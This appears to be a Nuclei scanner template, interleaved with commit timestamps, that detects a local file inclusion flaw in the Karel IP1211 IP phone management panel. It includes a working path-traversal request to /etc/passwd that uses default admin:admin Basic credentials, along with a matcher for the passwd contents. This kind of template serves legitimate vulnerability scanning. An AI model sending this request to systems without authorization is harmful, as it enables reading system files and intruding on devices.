2021-09-06 08:54:33 +00:00
id : karel-ip-phone-lfi
info :
2022-08-05 13:57:51 +00:00
name : Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
2021-09-06 08:54:33 +00:00
author : 0x_Akoko
severity : high
2022-08-05 13:57:51 +00:00
description : Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
2021-09-06 09:17:45 +00:00
reference :
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : karel,lfi
2021-09-06 08:54:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-06 08:54:33 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
2023-10-14 11:27:55 +00:00
2021-09-10 06:36:54 +00:00
headers :
Authorization : Basic YWRtaW46YWRtaW4=
2023-10-14 11:27:55 +00:00
2021-09-06 08:54:33 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100907dfeb3fa4c96d27022841cc4c95e35fa9993029897eacc8ec90dab391d734002202526a520a8b87fd6385d3406a8d2798d261407e4310998df18d83cb27ca5242b:922c64590222798bb761d5b6d8e72950